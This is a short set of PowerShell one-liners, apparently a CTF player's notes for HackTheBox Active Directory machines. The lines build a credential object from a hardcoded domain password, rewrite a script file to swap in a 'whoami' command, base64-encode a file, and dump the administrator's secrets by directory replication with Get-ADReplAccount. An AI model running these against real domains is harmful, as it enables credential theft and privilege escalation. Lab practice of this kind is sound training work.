$pass='AbsoluteLDAP2022!';$uname='absolute.htb\m.lovegod';$cred = new-object system.management.automation.pscredential($uname,$(convertto-securestring -asplaintext -force $pass))
$file = 'c:\file.txt';(Get-Content -Path $file -Raw).Replace('Get-Volume','whoami')|Set-Content -Path $file
[convert]::ToBase64String((Get-Content -path "" -Encoding byte))
Get-ADReplAccount -SamAccountName administrator -Server 'hathor.windcorp.htb'